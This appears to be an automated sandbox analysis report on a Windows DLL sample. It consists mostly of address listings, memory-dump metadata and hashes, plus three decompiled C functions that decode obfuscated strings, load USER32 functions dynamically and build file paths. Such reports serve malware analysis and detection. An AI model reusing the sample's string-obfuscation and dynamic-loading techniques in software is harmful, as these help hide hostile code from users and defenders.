                                                                                                                                                  0x677021b0
                                                                                                                                                  0x677021b7
                                                                                                                                                  0x677021bb
                                                                                                                                                  0x677021be
                                                                                                                                                  0x677021c1
                                                                                                                                                  0x677021c7
                                                                                                                                                  0x67702155
                                                                                                                                                  0x67702155
                                                                                                                                                  0x67702157
                                                                                                                                                  0x6770215a
                                                                                                                                                  0x67702162
                                                                                                                                                  0x67702165
                                                                                                                                                  0x6770216e
                                                                                                                                                  0x6770216e
                                                                                                                                                  0x67702171
                                                                                                                                                  0x67702174
                                                                                                                                                  0x67702177
                                                                                                                                                  0x6770217b
                                                                                                                                                  0x6770217f
                                                                                                                                                  0x67702182
                                                                                                                                                  0x6770218a
                                                                                                                                                  0x6770218d
                                                                                                                                                  0x6770218d
                                                                                                                                                  0x677021ce
                                                                                                                                                  0x677021d1
                                                                                                                                                  0x677021d4
                                                                                                                                                  0x677021e6
                                                                                                                                                  0x677021e9
                                                                                                                                                  0x677021ec
                                                                                                                                                  0x677021ef
                                                                                                                                                  0x677021f1
                                                                                                                                                  0x677021f5
                                                                                                                                                  0x677021f8
                                                                                                                                                  0x677021fd
                                                                                                                                                  0x67702204
                                                                                                                                                  0x67702210
                                                                                                                                                  0x67702213
                                                                                                                                                  0x67702216
                                                                                                                                                  0x6770221a
                                                                                                                                                  0x67702222
                                                                                                                                                  0x6770222a
                                                                                                                                                  0x67702232
                                                                                                                                                  0x67702235
                                                                                                                                                  0x67702235
                                                                                                                                                  0x6770223d
                                                                                                                                                  0x67702245
                                                                                                                                                  0x67702248
                                                                                                                                                  0x6770224d
                                                                                                                                                  0x67702250
                                                                                                                                                  0x6770225d
                                                                                                                                                  0x67702262
                                                                                                                                                  0x67702252
                                                                                                                                                  0x67702252
                                                                                                                                                  0x67702252
                                                                                                                                                  0x67702265
                                                                                                                                                  0x67702268
                                                                                                                                                  0x6770226d
                                                                                                                                                  0x6770226d
                                                                                                                                                  0x67702275
                                                                                                                                                  0x6770227a
                                                                                                                                                  0x67702280
                                                                                                                                                  0x67702285
                                                                                                                                                  0x67702288
                                                                                                                                                  0x6770228d
                                                                                                                                                  0x67702293
                                                                                                                                                  0x67702296
                                                                                                                                                  0x677022a7
                                                                                                                                                  0x67702298
                                                                                                                                                  0x67702298
                                                                                                                                                  0x6770229e
                                                                                                                                                  0x677022a3
                                                                                                                                                  0x677022a3
                                                                                                                                                  0x677022ae
                                                                                                                                                  0x677022b3
                                                                                                                                                  0x677022b3
                                                                                                                                                  0x677022b9
                                                                                                                                                  0x677022c1
                                                                                                                                                  0x677022c1
                                                                                                                                                  0x00000000
                                                                                                                                                  0x677021d6
                                                                                                                                                  0x677021d9
                                                                                                                                                  0x67701f87
                                                                                                                                                  0x67701f87
                                                                                                                                                  0x00000000
                                                                                                                                                  0x67701f87
                                                                                                                                                  0x677021d4
                                                                                                                                                  0x67701ee8
                                                                                                                                                  0x67701eeb
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x67701ef3
                                                                                                                                                  0x67701ef6
                                                                                                                                                  0x67701ef9
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x67701eff
                                                                                                                                                  0x67701f01
                                                                                                                                                  0x67701f04
                                                                                                                                                  0x67701f06
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x67701f11
                                                                                                                                                  0x67701f16
                                                                                                                                                  0x67701f19
                                                                                                                                                  0x67701f1b
                                                                                                                                                  0x67701f1e
                                                                                                                                                  0x67701f21
                                                                                                                                                  0x67701f24
                                                                                                                                                  0x67701f33
                                                                                                                                                  0x67701f35
                                                                                                                                                  0x67701f38
                                                                                                                                                  0x67701f3a
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x67701f41
                                                                                                                                                  0x67701f46
                                                                                                                                                  0x67701f46
                                                                                                                                                  0x67701f49
                                                                                                                                                  0x67701f4c
                                                                                                                                                  0x67701f51
                                                                                                                                                  0x67701f58
                                                                                                                                                  0x67701f5b
                                                                                                                                                  0x67701f5e
                                                                                                                                                  0x67701f62
                                                                                                                                                  0x67701f6a
                                                                                                                                                  0x67701f6d
                                                                                                                                                  0x67701f72
                                                                                                                                                  0x67701f74
                                                                                                                                                  0x67701f77
                                                                                                                                                  0x67701f7a
                                                                                                                                                  0x67701f91
                                                                                                                                                  0x67701f93
                                                                                                                                                  0x67701f96
                                                                                                                                                  0x67701f98
                                                                                                                                                  0x67701fe0
                                                                                                                                                  0x67701fea
                                                                                                                                                  0x67701fed
                                                                                                                                                  0x67701ff2
                                                                                                                                                  0x67701ff5
                                                                                                                                                  0x67701ffc
                                                                                                                                                  0x67702000
                                                                                                                                                  0x67702003
                                                                                                                                                  0x67702006
                                                                                                                                                  0x6770200c
                                                                                                                                                  0x67701f9a
                                                                                                                                                  0x67701f9a
                                                                                                                                                  0x67701f9c
                                                                                                                                                  0x67701f9f
                                                                                                                                                  0x67701fa7
                                                                                                                                                  0x67701faa
                                                                                                                                                  0x67701fb3
                                                                                                                                                  0x67701fb3
                                                                                                                                                  0x67701fb6
                                                                                                                                                  0x67701fb9
                                                                                                                                                  0x67701fbc
                                                                                                                                                  0x67701fc0
                                                                                                                                                  0x67701fc4
                                                                                                                                                  0x67701fc7
                                                                                                                                                  0x67701fcf
                                                                                                                                                  0x67701fd2
                                                                                                                                                  0x67701fd2
                                                                                                                                                  0x67702013
                                                                                                                                                  0x67702016
                                                                                                                                                  0x6770201b
                                                                                                                                                  0x67702035
                                                                                                                                                  0x67702037
                                                                                                                                                  0x6770203a
                                                                                                                                                  0x6770203e
                                                                                                                                                  0x67702040
                                                                                                                                                  0x67702042
                                                                                                                                                  0x67702046
                                                                                                                                                  0x67702048
                                                                                                                                                  0x6770204d
                                                                                                                                                  0x6770204d
                                                                                                                                                  0x67702053
                                                                                                                                                  0x67702058
                                                                                                                                                  0x67702064
                                                                                                                                                  0x67702068
                                                                                                                                                  0x6770206b
                                                                                                                                                  0x67702073
                                                                                                                                                  0x6770207b
                                                                                                                                                  0x67702083
                                                                                                                                                  0x67702086
                                                                                                                                                  0x67702086
                                                                                                                                                  0x6770208e
                                                                                                                                                  0x67702096
                                                                                                                                                  0x67702099
                                                                                                                                                  0x6770209e
                                                                                                                                                  0x677020a1
                                                                                                                                                  0x677020ae
                                                                                                                                                  0x677020b3
                                                                                                                                                  0x677020a3
                                                                                                                                                  0x677020a3
                                                                                                                                                  0x677020a3
                                                                                                                                                  0x677020b6
                                                                                                                                                  0x677020b9
                                                                                                                                                  0x677020be
                                                                                                                                                  0x677020be
                                                                                                                                                  0x677020c6
                                                                                                                                                  0x677020d1
                                                                                                                                                  0x677020d6
                                                                                                                                                  0x677020d9
                                                                                                                                                  0x677020e1
                                                                                                                                                  0x677020e6
                                                                                                                                                  0x677020e6
                                                                                                                                                  0x677020ec
                                                                                                                                                  0x677020f4
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770201d
                                                                                                                                                  0x67702020
                                                                                                                                                  0x67702028
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770202d
                                                                                                                                                  0x6770201b
                                                                                                                                                  0x67701f7f
                                                                                                                                                  0x00000000
                                                                                                                                                  0x67701f84
                                                                                                                                                  0x00000000
                                                                                                                                                  0x67701f24
                                                                                                                                                  0x67701dd9
                                                                                                                                                  0x67701ddc
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x67701de4
                                                                                                                                                  0x67701de7
                                                                                                                                                  0x67701dea
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x67701dec
                                                                                                                                                  0x67701dee
                                                                                                                                                  0x67701df1
                                                                                                                                                  0x67701df3
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x67701dfa
                                                                                                                                                  0x67701e12
                                                                                                                                                  0x67701e15
                                                                                                                                                  0x67701e18
                                                                                                                                                  0x67701e24
                                                                                                                                                  0x67701e30
                                                                                                                                                  0x67701e33
                                                                                                                                                  0x67701e36
                                                                                                                                                  0x67701e3b
                                                                                                                                                  0x67701e3e
                                                                                                                                                  0x67701e43
                                                                                                                                                  0x67701e43
                                                                                                                                                  0x67701e48
                                                                                                                                                  0x67701e4b
                                                                                                                                                  0x00000000
                                                                                                                                                  0x67701e51
                                                                                                                                                  0x67701e51
                                                                                                                                                  0x67701e55
                                                                                                                                                  0x67701e58
                                                                                                                                                  0x67701e5a
                                                                                                                                                  0x67701e5c
                                                                                                                                                  0x67701e5c
                                                                                                                                                  0x67701e5f
                                                                                                                                                  0x67701e64
                                                                                                                                                  0x67701e69
                                                                                                                                                  0x67701e72
                                                                                                                                                  0x67701e76
                                                                                                                                                  0x67701e7e
                                                                                                                                                  0x67701e86
                                                                                                                                                  0x67701e89
                                                                                                                                                  0x67701e89
                                                                                                                                                  0x67701e96
                                                                                                                                                  0x67701e9e
                                                                                                                                                  0x67701ea1
                                                                                                                                                  0x67701ea8
                                                                                                                                                  0x67701eb2
                                                                                                                                                  0x67701eb5
                                                                                                                                                  0x67701eb5
                                                                                                                                                  0x67701eb5
                                                                                                                                                  0x67701eb5
                                                                                                                                                  0x67701eba
                                                                                                                                                  0x67701ebf
                                                                                                                                                  0x67701ec2
                                                                                                                                                  0x67701ec7
                                                                                                                                                  0x67701ecc
                                                                                                                                                  0x67701ecc
                                                                                                                                                  0x67701ed2
                                                                                                                                                  0x00000000
                                                                                                                                                  0x67701ed7
                                                                                                                                                  0x67701e4b
                                                                                                                                                  0x67701db2
                                                                                                                                                  0x00000000

                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.577887869.0000000067701000.00000020.00020000.sdmp, Offset: 67700000, based on PE: true
                                                                                                                                                  • Associated: 00000002.00000002.577869241.0000000067700000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577922404.0000000067711000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577942811.0000000067716000.00000004.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577960544.000000006771A000.00000002.00020000.sdmp Download File
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: free$malloc
                                                                                                                                                  • String ID: bb5168$bc5d61
                                                                                                                                                  • API String ID: 2190258309-2148032683
                                                                                                                                                  • Opcode ID: 4eaeb6d17a82978346a7fa2f890489c41f051bea1685bfa9fee757c94729dcba
                                                                                                                                                  • Instruction ID: 1118badca612bb23c7a5b238923f97662151236b0a9fea342f7b9be415d5b271
                                                                                                                                                  • Opcode Fuzzy Hash: 4eaeb6d17a82978346a7fa2f890489c41f051bea1685bfa9fee757c94729dcba
                                                                                                                                                  • Instruction Fuzzy Hash: C7F1C4F27092819ACA04DF22976876DA7D2AB9EFCCF848825CF4A47704EF3DD5558342
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 6770D658, Relevance: 38.6, APIs: 16, Strings: 6, Instructions: 136libraryloaderCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.577887869.0000000067701000.00000020.00020000.sdmp, Offset: 67700000, based on PE: true
                                                                                                                                                  • Associated: 00000002.00000002.577869241.0000000067700000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577922404.0000000067711000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577942811.0000000067716000.00000004.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577960544.000000006771A000.00000002.00020000.sdmp Download File
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Pointer$AddressDecodeEncodeProc$LibraryLoad
                                                                                                                                                  • String ID: GetActiveWindow$GetLastActivePopup$GetProcessWindowStation$GetUserObjectInformationW$MessageBoxW$USER32.DLL
                                                                                                                                                  • API String ID: 2643518689-564504941
                                                                                                                                                  • Opcode ID: 8dcc98bedde65b98dcb9abfb16cfaeb91554264ce640f19a9d5363253f1c0561
                                                                                                                                                  • Instruction ID: b9f8d4d6fdfc2972d3cf43b8e0aa574b5715dbec17cc18810a52b057ebbda08c
                                                                                                                                                  • Opcode Fuzzy Hash: 8dcc98bedde65b98dcb9abfb16cfaeb91554264ce640f19a9d5363253f1c0561
                                                                                                                                                  • Instruction Fuzzy Hash: 6A51357070EB0285EE04DB52F96872823A2BB9DBD8F981535DD1E47760EF7AC065C348
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 6770635C, Relevance: 34.7, APIs: 12, Strings: 11, Instructions: 210COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  C-Code - Quality: 89%
                                                                                                                                                  			E6770635C(void* __edi, void* __esp, long long* __rax, signed short* __rcx, void* __rdx, signed short* _a8, long long _a16, long long _a24, long long _a32) {
				long long _v80;
				long long _v88;
				long long _v92;
				long long _v96;
				long long _v104;
				long long _v108;
				long long _v112;
				long long _v116;
				long long _v120;
				long long _v124;
				long long _v128;
				long long _v136;
				long long _v140;
				long long _v144;
				long long _v152;
				void* __rbx;
				void* __rdi;
				void* __rsi;
				void* __rbp;
				void* _t86;
				signed int _t90;
				void* _t95;
				void* _t96;
				void* _t97;
				void* _t98;
				void* _t99;
				void* _t100;
				long long* _t102;
				long long _t103;
				long long _t104;
				long long _t105;
				long long _t106;
				long long _t107;
				void* _t112;
				long long* _t114;
				long long* _t165;
				intOrPtr _t167;
				intOrPtr _t169;
				void* _t173;
				intOrPtr _t175;
				long long _t177;
				long long _t179;
				long long _t181;

				_t152 = __rdx;
				_t102 = __rax;
				_t99 = __esp;
				_t95 = __edi;
				_a8 = __rcx;
				if(__rcx != 0) {
					E67701000(_t112, "c0572c", __rdx, _t173);
					_v88 = _t102;
					E67701000(_t112, "c0572d", _t152, _t173);
					_v120 = _t102;
					E67701000(_t112, "c0572e", _t152, _t173);
					_v136 = _t102;
					E67701000(_t112, "c0572f", _t152, _t173);
					E67701000(_t112, "c05730", _t152, _t173);
					E67701000(_t112, "ca59", _t152, _t173);
					E67701000(_t112, "bd49", _t152, _t173);
					E67701000(_t112, "bd495d87c0", _t152, _t173);
					_t168 = _t102;
					E67701000(_t112, "b958", _t152, _t173);
					_t166 = _t102;
					E67701000(_t112, "b94a63", _t152, _t173);
					_t113 = _t102;
					E67701000(_t102, "bc5360", _t152, _t173);
					E677066C0(__edi, _t97, _t98, __esp, _t102, _a8, _v136, _t102, _t102);
					_v104 = _t102;
					E677066C0(__edi, _t97, _t98, __esp, _t102, _a8, _t102, _t102, _t102);
					_v152 = _t102;
					E677066C0(__edi, _t97, _t98, __esp, _t113, _a8, _t102, _t102, _t168);
					_a32 = _t102;
					E677066C0(__edi, _t97, _t98, __esp, _t113, _a8, _t102, _t166, _t168);
					_a16 = _t102;
					E677066C0(__edi, _t97, _t98, __esp, _t113, _a8, _t113, _t166, _t168);
					_v112 = _t102;
					E677066C0(__edi, _t97, _t98, __esp, _t113, _a8, _t102, _t166, _t168);
					_v144 = _t102;
					E677066C0(__edi, _t97, _t98, __esp, _t113, _a8, _v120, _t166, _t168);
					_v128 = _t102;
					E677066C0(__edi, _t97, _t98, __esp, _t113, _a8, _t102, _t166, _t168);
					_v80 = _t102;
					E677066C0(__edi, _t97, _t98, __esp, _t113, _a8, _v88, _t166, _t168);
					_v96 = _t102;
					E677066C0(__edi, _t97, _t98, __esp, _t113, _a8, _t166, _t166, _t168);
					_a24 = _t102;
					E677066C0(__edi, _t97, _t98, __esp, _t113, _a8, _t102, _t166, _t168);
					_a8 = _t102;
					free(??);
					free(??);
					free(??);
					free(??);
					free(??);
					free(??);
					free(??);
					free(??);
					free(??);
					free(??);
					free(??);
					_t181 = _v144;
					_t167 = _v152;
					_t177 = _a8;
					_t175 = _a32;
					_t169 = _a24;
					_t179 = _a16;
					_t86 = 0;
					if(_v96 != _t102 || _v128 != _t102 || _v104 != _t102 || _t181 != 0 || _v80 != _t102 || _t167 != 0 || _t177 != 0 || _t175 != 0 || _t169 != 0 || _v112 != _t102 || _t179 != 0) {
						malloc();
						_t165 = _t102;
						_t114 = _t102;
						_t44 = _t102 + 0x50; // 0x50
						_t90 = _t44;
						_t86 = memset(_t95, 0, _t90 << 0);
						_t100 = _t99 + 0xc;
						_t96 = _t95 + _t90;
						_t103 = _v116;
						if(_t103 != 0) {
							 *((long long*)(_t114 + 0x10)) = _t103;
						}
						if(_t177 != 0) {
							 *((long long*)(_t114 + 0x28)) = _t177;
						}
						if(_t179 != 0) {
							 *((long long*)(_t114 + 0x40)) = _t179;
						}
						if(_t181 != 0) {
							 *((long long*)(_t114 + 0x18)) = _t181;
						}
						if(_t175 != 0) {
							 *((intOrPtr*)(_t114 + 0x30)) =  *((intOrPtr*)( *((intOrPtr*)(_t175 + 8))));
							_t86 = E677039E8(_t96, _t100,  *((intOrPtr*)(_t175 + 8)), _t114, _t175, _t165);
						}
						if(_t169 != 0) {
							 *((short*)(_t114 + 0x4c)) =  *_a8 & 0x0000ffff;
							_t86 = E677039E8(_t96, _t100, _a8, _t114, _t169, _t165);
						}
						_t104 = _v140;
						if(_t104 != 0) {
							 *((long long*)(_t114 + 8)) = _t104;
						}
						_t105 = _v124;
						if(_t105 != 0) {
							 *((long long*)(_t114 + 0x38)) = _t105;
						}
						_t106 = _v108;
						if(_t106 != 0) {
							 *_t114 = _t106;
						}
						_t107 = _v92;
						if(_t107 != 0) {
							 *((long long*)(_t114 + 0x20)) = _t107;
						}
						if(_t167 != 0) {
							 *((intOrPtr*)(_t114 + 0x48)) =  *((intOrPtr*)( *((intOrPtr*)(_t167 + 8))));
							_t86 = E677039E8(_t96, _t100,  *((intOrPtr*)(_t167 + 8)), _t114, _t167, _t165);
						}
					}
				} else {
					_t86 = 0;
				}
				return _t86;
			}














































                                                                                                                                                  0x6770635c
                                                                                                                                                  0x6770635c
                                                                                                                                                  0x6770635c
                                                                                                                                                  0x6770635c
                                                                                                                                                  0x6770635c
                                                                                                                                                  0x67706374
                                                                                                                                                  0x67706384
                                                                                                                                                  0x67706390
                                                                                                                                                  0x67706395
                                                                                                                                                  0x677063a1
                                                                                                                                                  0x677063a6
                                                                                                                                                  0x677063b2
                                                                                                                                                  0x677063b7
                                                                                                                                                  0x677063c6
                                                                                                                                                  0x677063d5
                                                                                                                                                  0x677063e4
                                                                                                                                                  0x677063f3
                                                                                                                                                  0x677063ff
                                                                                                                                                  0x67706402
                                                                                                                                                  0x6770640e
                                                                                                                                                  0x67706411
                                                                                                                                                  0x6770641d
                                                                                                                                                  0x67706420
                                                                                                                                                  0x67706435
                                                                                                                                                  0x67706445
                                                                                                                                                  0x6770644a
                                                                                                                                                  0x6770645a
                                                                                                                                                  0x6770645f
                                                                                                                                                  0x6770646f
                                                                                                                                                  0x67706477
                                                                                                                                                  0x67706487
                                                                                                                                                  0x6770648f
                                                                                                                                                  0x6770649f
                                                                                                                                                  0x677064a4
                                                                                                                                                  0x677064b6
                                                                                                                                                  0x677064bb
                                                                                                                                                  0x677064cb
                                                                                                                                                  0x677064d0
                                                                                                                                                  0x677064e2
                                                                                                                                                  0x677064e7
                                                                                                                                                  0x677064f7
                                                                                                                                                  0x677064fc
                                                                                                                                                  0x6770650c
                                                                                                                                                  0x67706514
                                                                                                                                                  0x6770651e
                                                                                                                                                  0x67706526
                                                                                                                                                  0x67706530
                                                                                                                                                  0x6770653a
                                                                                                                                                  0x67706542
                                                                                                                                                  0x6770654a
                                                                                                                                                  0x67706552
                                                                                                                                                  0x6770655a
                                                                                                                                                  0x67706562
                                                                                                                                                  0x6770656a
                                                                                                                                                  0x67706572
                                                                                                                                                  0x6770657a
                                                                                                                                                  0x6770657f
                                                                                                                                                  0x67706584
                                                                                                                                                  0x67706589
                                                                                                                                                  0x67706591
                                                                                                                                                  0x67706599
                                                                                                                                                  0x677065a1
                                                                                                                                                  0x677065a9
                                                                                                                                                  0x677065b0
                                                                                                                                                  0x677065f5
                                                                                                                                                  0x677065fa
                                                                                                                                                  0x677065fd
                                                                                                                                                  0x67706602
                                                                                                                                                  0x67706602
                                                                                                                                                  0x67706605
                                                                                                                                                  0x67706605
                                                                                                                                                  0x67706605
                                                                                                                                                  0x67706607
                                                                                                                                                  0x6770660f
                                                                                                                                                  0x67706611
                                                                                                                                                  0x67706611
                                                                                                                                                  0x67706618
                                                                                                                                                  0x6770661a
                                                                                                                                                  0x6770661a
                                                                                                                                                  0x67706621
                                                                                                                                                  0x67706623
                                                                                                                                                  0x67706623
                                                                                                                                                  0x6770662a
                                                                                                                                                  0x6770662c
                                                                                                                                                  0x6770662c
                                                                                                                                                  0x67706633
                                                                                                                                                  0x6770663c
                                                                                                                                                  0x67706642
                                                                                                                                                  0x67706642
                                                                                                                                                  0x6770664a
                                                                                                                                                  0x67706653
                                                                                                                                                  0x6770665a
                                                                                                                                                  0x6770665a
                                                                                                                                                  0x6770665f
                                                                                                                                                  0x67706667
                                                                                                                                                  0x67706669
                                                                                                                                                  0x67706669
                                                                                                                                                  0x6770666d
                                                                                                                                                  0x67706675
                                                                                                                                                  0x67706677
                                                                                                                                                  0x67706677
                                                                                                                                                  0x6770667b
                                                                                                                                                  0x67706683
                                                                                                                                                  0x67706685
                                                                                                                                                  0x67706685
                                                                                                                                                  0x67706688
                                                                                                                                                  0x67706690
                                                                                                                                                  0x67706692
                                                                                                                                                  0x67706692
                                                                                                                                                  0x67706699
                                                                                                                                                  0x677066a1
                                                                                                                                                  0x677066a7
                                                                                                                                                  0x677066a7
                                                                                                                                                  0x677066ac
                                                                                                                                                  0x67706376
                                                                                                                                                  0x67706376
                                                                                                                                                  0x67706376
                                                                                                                                                  0x677066bf

                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.577887869.0000000067701000.00000020.00020000.sdmp, Offset: 67700000, based on PE: true
                                                                                                                                                  • Associated: 00000002.00000002.577869241.0000000067700000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577922404.0000000067711000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577942811.0000000067716000.00000004.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577960544.000000006771A000.00000002.00020000.sdmp Download File
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: free
                                                                                                                                                  • String ID: b94a63$b958$bc5360$bd49$bd495d87c0$c0572c$c0572d$c0572e$c0572f$c05730$ca59
                                                                                                                                                  • API String ID: 1294909896-3303358998
                                                                                                                                                  • Opcode ID: 69462a9aedf7e2a2bca52f6aa81549e3494bf86a2ee359d180b2267770e90565
                                                                                                                                                  • Instruction ID: 3dfe37e13722b81b5c034803e8d5c29d1febaf0fe50fbcac19b6cc531ee49d99
                                                                                                                                                  • Opcode Fuzzy Hash: 69462a9aedf7e2a2bca52f6aa81549e3494bf86a2ee359d180b2267770e90565
                                                                                                                                                  • Instruction Fuzzy Hash: 238127B621AB8081DA10DF22A66876AA3F4F78DBDCF540425EE8D87758FF38C190C741
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 67705DE4, Relevance: 28.1, APIs: 9, Strings: 7, Instructions: 97stringCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  C-Code - Quality: 61%
                                                                                                                                                  			E67705DE4(void* __ecx, void* __edi, void* __esp, long long __rbx, void* __rdx, long long __rdi, void* __rsi, long long __rbp, void* __r8, long long _a8, long long _a16, long long _a24) {
				void* _v36;
				signed long long _v40;
				signed int _v52;
				void* _v1928;
				intOrPtr _v2208;
				char _v2212;
				intOrPtr _v2216;
				signed long long _v2224;
				long long _v2232;
				signed long long _v2240;
				long long _v2248;
				signed long long _v2256;
				long long _v2264;
				void* _t31;
				void* _t53;
				signed long long _t62;
				signed long long _t63;
				signed long long _t66;
				void* _t94;
				void* _t98;
				signed long long _t104;
				signed long long _t106;
				signed long long _t107;
				signed long long _t108;

				_t101 = __r8;
				_t94 = __rsi;
				_t89 = __rdx;
				_t65 = __rbx;
				_t53 = __edi;
				_a8 = __rbx;
				_a16 = __rbp;
				_a24 = __rdi;
				_t99 = _t98 - 0x8e0;
				_t62 =  *0x67716000; // 0x9b7b11e8241
				_t63 = _t62 ^ _t98 - 0x000008e0;
				_v40 = _t63;
				r8d = 0x118;
				E67709420(_t31, __ecx, 0,  &_v2212, __rdx, __r8);
				_v2216 = 0x11c;
				if(GetVersionExW(??) == 0 || _v2212 != 6) {
					L4:
					dil = 0;
					__eflags = dil;
				} else {
					_t59 = _v2208 - 2;
					if(_v2208 != 2) {
						goto L4;
					} else {
						dil = 1;
					}
				}
				E67701160(_t59, _t63, _t65, "aa546299c47acbc7", _t94, _t101);
				_t66 = _t63;
				E67701160(_t59, _t63, _t66, "a44e5f97bc8cc8c84f", _t94, _t101);
				_t106 = _t63;
				E67701160(_t59, _t63, _t66, "a032416f9d", _t94, _t101);
				_t107 = _t63;
				E67701160(_t59, _t63, _t66, "9a546894bf8c", _t94, _t101);
				_t108 = _t63;
				E67701160(_t59, _t63, _t66, "a44e6a8a", _t94, _t101);
				_t76 = "\\";
				_t104 = _t66;
				if(dil == 0) {
					_v2224 = _t108;
					_v2232 = _t76;
					_v2240 = _t107;
					_v2248 = _t76;
					_v2256 = _t106;
					_v2264 = _t76;
					E67706F0C(_t89, L"%ls%ls%ls%ls%ls%ls%ls", _t104);
				} else {
					_v2256 = _t63;
					_v2264 = "\\";
					E67706F0C(_t89, L"%ls%ls%ls", _t104);
				}
				free();
				free(??);
				free(??);
				free(??);
				free(??);
				lstrlenW(??);
				malloc(??);
				lstrcpyW(??, ??);
				memset(_t53, 0, 0x75e << 0);
				return E67706F80(0, _v52 ^ _t99);
			}



























                                                                                                                                                  0x67705de4
                                                                                                                                                  0x67705de4
                                                                                                                                                  0x67705de4
                                                                                                                                                  0x67705de4
                                                                                                                                                  0x67705de4
                                                                                                                                                  0x67705de4
                                                                                                                                                  0x67705de9
                                                                                                                                                  0x67705dee
                                                                                                                                                  0x67705df9
                                                                                                                                                  0x67705e00
                                                                                                                                                  0x67705e07
                                                                                                                                                  0x67705e0a
                                                                                                                                                  0x67705e19
                                                                                                                                                  0x67705e1f
                                                                                                                                                  0x67705e29
                                                                                                                                                  0x67705e39
                                                                                                                                                  0x67705e4e
                                                                                                                                                  0x67705e4e
                                                                                                                                                  0x67705e4e
                                                                                                                                                  0x67705e42
                                                                                                                                                  0x67705e42
                                                                                                                                                  0x67705e47
                                                                                                                                                  0x00000000
                                                                                                                                                  0x67705e49
                                                                                                                                                  0x67705e49
                                                                                                                                                  0x67705e49
                                                                                                                                                  0x67705e47
                                                                                                                                                  0x67705e58
                                                                                                                                                  0x67705e64
                                                                                                                                                  0x67705e67
                                                                                                                                                  0x67705e73
                                                                                                                                                  0x67705e76
                                                                                                                                                  0x67705e82
                                                                                                                                                  0x67705e85
                                                                                                                                                  0x67705e91
                                                                                                                                                  0x67705e94
                                                                                                                                                  0x67705e99
                                                                                                                                                  0x67705ea0
                                                                                                                                                  0x67705eae
                                                                                                                                                  0x67705ed0
                                                                                                                                                  0x67705ed5
                                                                                                                                                  0x67705eda
                                                                                                                                                  0x67705edf
                                                                                                                                                  0x67705ee4
                                                                                                                                                  0x67705ee9
                                                                                                                                                  0x67705efd
                                                                                                                                                  0x67705eb0
                                                                                                                                                  0x67705eb0
                                                                                                                                                  0x67705eb5
                                                                                                                                                  0x67705ec9
                                                                                                                                                  0x67705ec9
                                                                                                                                                  0x67705f05
                                                                                                                                                  0x67705f0d
                                                                                                                                                  0x67705f15
                                                                                                                                                  0x67705f1d
                                                                                                                                                  0x67705f25
                                                                                                                                                  0x67705f32
                                                                                                                                                  0x67705f3f
                                                                                                                                                  0x67705f52
                                                                                                                                                  0x67705f67
                                                                                                                                                  0x67705f99

                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.577887869.0000000067701000.00000020.00020000.sdmp, Offset: 67700000, based on PE: true
                                                                                                                                                  • Associated: 00000002.00000002.577869241.0000000067700000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577922404.0000000067711000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577942811.0000000067716000.00000004.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577960544.000000006771A000.00000002.00020000.sdmp Download File
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: free$Versionlstrcpylstrlenmalloc
                                                                                                                                                  • String ID: %ls%ls%ls$%ls%ls%ls%ls%ls%ls%ls$9a546894bf8c$a032416f9d$a44e5f97bc8cc8c84f$a44e6a8a$aa546299c47acbc7
                                                                                                                                                  • API String ID: 2945070811-959278603
                                                                                                                                                  • Opcode ID: af4e96dcd984d307db42279a094686831460c32fc39ef3c6fd622c51aa23c6d5
                                                                                                                                                  • Instruction ID: f386b80a63724b37154211f439f75056b5ed638e88913046b8c8bc41528c01ea
                                                                                                                                                  • Opcode Fuzzy Hash: af4e96dcd984d307db42279a094686831460c32fc39ef3c6fd622c51aa23c6d5
                                                                                                                                                  • Instruction Fuzzy Hash: 92418071218B8095DA20DB21F95479AB7E5F78C78CFC40126EA8D87718EF79C255CB01
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

